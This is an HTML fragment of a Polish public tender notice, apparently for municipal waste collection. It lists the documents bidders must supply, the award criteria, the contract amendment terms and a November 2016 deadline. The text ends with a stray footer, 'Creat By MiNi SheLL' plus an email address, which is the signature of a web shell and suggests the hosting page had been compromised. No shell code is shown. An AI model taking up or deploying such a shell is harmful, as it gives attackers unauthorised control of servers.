                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1)W celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału w postępowaniu, Zamawiający żąda dostarczenia następujących dokumentów:  
a) informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 13, 14 i 21 ustawy oraz, odnośnie skazania za wykroczenie na karę aresztu, w zakresie określonym przez zamawiającego na podstawie art. 24 ust. 5 pkt 5 i 6 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu; 
b)zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków, wystawionego  nie  wcześniej niż 3 miesiące przed upływem terminu składania ofert lub  innego  dokumentu potwierdzającego ze  wykonawca  zawarł porozumienie  z  właściwym organem  podatkowym w  sprawie  spłat  tych  należności  wraz  z  ewentualnymi  odsetkami lub  grzywnami, w szczególności  uzyskał  przewidziane  prawem  zwolnienie, odroczenie lub  rozłożenie  na  raty zaległych  płatności  lub  wstrzymanie  w  całości  wykonania  decyzji  właściwego  organu.

 c) zaświadczenia właściwej  terenowej  jednostki  organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego  albo  innego  dokumentu  stwierdzającego  ze  wykonawca nie  zalega  z  opłacaniem składek na ubezpieczenia  społeczne lub  zdrowotne, wystawionego   nie  wcześniej   niż  3  miesiące  przed  upływem  terminu  składania  ofert lub  innego  dokumentu  potwierdzającego  ze  wykonawca  zawarł  porozumienie  z  właściwym  organem  w  sprawie  spłat  tych  należności  wraz  z  ewentualnymi  odsetkami  lub grzywnami , w  szczególności  uzyskał  przewidziane  prawem  zwolnienie , odroczenie  lub  rozłożenie   na  raty  zaległych  płatności  lub wstrzymanie  w  całości  wykonania  decyzji  właściwego  organu .potwierdzenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
d) odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 5 pkt 1 ustawy.  
e) oświadczenia wykonawcy o niezaleganiu z opłacaniem podatków i opłat lokalnych, o których mowa w ustawie z dnia 12 stycznia 1991 r. o podatkach i opłatach lokalnych (Dz. U. z 2016 r. poz. 716);
f) oświadczenie wykonawcy o braku orzeczenia wobec niego tytułem środka zapobiegawczego zakazu ubiegania się o zamówienia publiczne;

</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />W celu potwierdzenia przez wykonawcę spełnienia warunków udziału w postępowaniu dotyczących sytuacji ekonomicznej lub finansowej zamawiający żąda dostarczenia następujących dokumentów:  
a) informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, w okresie nie wcześniejszym niż 1 miesiąc przed upływem terminu składania ofert. 
3) W celu potwierdzenia przez wykonawcę spełnienia warunków udziału w postępowaniu dotyczących zdolności technicznej lub zawodowej zamawiający żąda dostarczenia następujących dokumentów:  
a) wykaz usług  wykonanych , a w przypadku świadczeń  okresowych  lub  ciągłych również  wykonywanych  w  okresie  ostatnich  trzech  lat  przed  upływem  terminu  składania  ofert, a  jeżeli  okres prowadzenia  działalności  jest krótszy - w tym okresie, wraz z podaniem ich  wartości , przedmiotu, dat  wykonania i podmiotów, na  rzecz których  dostawy  zostały  wykonane, oraz  załączeniem  dowodów  określających czy te  usługi zostały  wykonane  lub są  wykonywane  należycie , przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego dostawy były wykonywane, a w  przypadku  świadczeń  okresowych  lub  ciągłych  są  wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  oświadczenie  wykonawcy; w  przypadku świadczeń okresowych lub ciągłych nadal  wykonywanych referencje  bądź  inne   dokumenty potwierdzające ich  należyte wykonywanie powinny wydane  nie  wcześniej   niż 3  miesiące przed   upływem  terminu składania ofert albo wniosków o  dopuszczenie do  udziału  w  postepowaniu; 
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px"></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena </td><td>60</td></tr><tr><td>termin płatności faktury</td><td>20</td></tr><tr><td>częstoliwość   odbioru  odpadów  komunalnych </td><td>20</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />) W przypadkach  przewidzianych w umowie dopuszcza się wprowadzenie zmian za zgodą zamawiającego. Zmiana ta  ma być dokonana w drodze aneksu pisemnego  pod rygorem nieważności. Zmiany przewidziane w umowie mogą  być inicjowane przez Zamawiającego lub przez Wykonawcę. Zmiany o których mowa  mogą dotyczyć:
a) zmiany wynagrodzenia , jeżeli nastąpi  zmiana  kosztów  zewnętrznych  będących podstawą  kalkulacji ceny ofertowej,
b) nastąpi zmiana wysokości podatku  VAT
c) nastąpi znacząca  zmiana  ceny paliw powyżej  20% ceny obowiązującej  w  dniu  składania  oferty
d) zmiany podwykonawców pod warunkiem uzyskania akceptacji  Zamawiającego
e) zmiany  w  zakresie  sposobu  realizacji umowy  w przypadku zmiany przepisów prawa  wpływających na  sposób realizacji umowy w tym zmiany przepisów prawa  lokalnego ( np. regulaminu  utrzymania czystości i porządku  w  gminie, 
f) zmiany  osób odpowiedzialnych  za kontakty i nadzór  nad realizacją  przedmiotu  umowy 
g) wystąpienie  oczywistych omyłek  pisarskich i  rachunkowych  w treści umowy. 
h) wystąpienia siły wyższej, przy czym za siłę wyższą uważa się wszystkie zdarzenia, jakich nie da się przewidzieć w chwili zawarcia umowy i na które żadna ze stron nie będzie miała wpływu,  w szczególności: działania wojenne, rozruchy, klęska żywiołowa,
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 15/11/2016, godzina: 09:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com